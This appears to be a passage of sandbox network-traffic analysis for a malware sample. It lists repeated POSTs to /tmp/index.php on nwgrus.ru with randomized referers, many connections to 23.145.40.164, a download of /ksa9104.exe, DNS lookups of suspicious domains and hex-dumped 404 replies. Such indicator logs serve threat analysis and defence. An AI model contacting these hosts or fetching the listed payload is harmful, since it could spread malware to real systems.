      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wijyucejeixqcq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 323Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tvxqtlroqjamdu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 131Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qiqpuprruvmqycfg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 239Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ducngusiibkxomb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 204Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://itbfgbtaejscu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 173Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fmklqfxisct.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 115Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ukccamwydghjkfi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 253Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nkxctepgnvx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 253Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ijdjdfrkcsdu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 170Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://virsnusoyawwgc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 311Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mtnalmdiriqcam.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 223Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://chjuadirxhpxkwiq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 122Host: nwgrus.ru
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /ksa9104.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.164
      Source: global trafficDNS traffic detected: DNS query: nwgrus.ru
      Source: global trafficDNS traffic detected: DNS query: ninjahallnews.com
      Source: global trafficDNS traffic detected: DNS query: fallhandbat.com
      Source: unknownHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fxxmebwwqsmoglpj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 279Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:37:27 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 87 ee Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:37:28 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:37:29 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:37:32 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:37:36 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:37:37 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:37:40 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:37:41 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:37:42 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:37:43 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:37:46 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
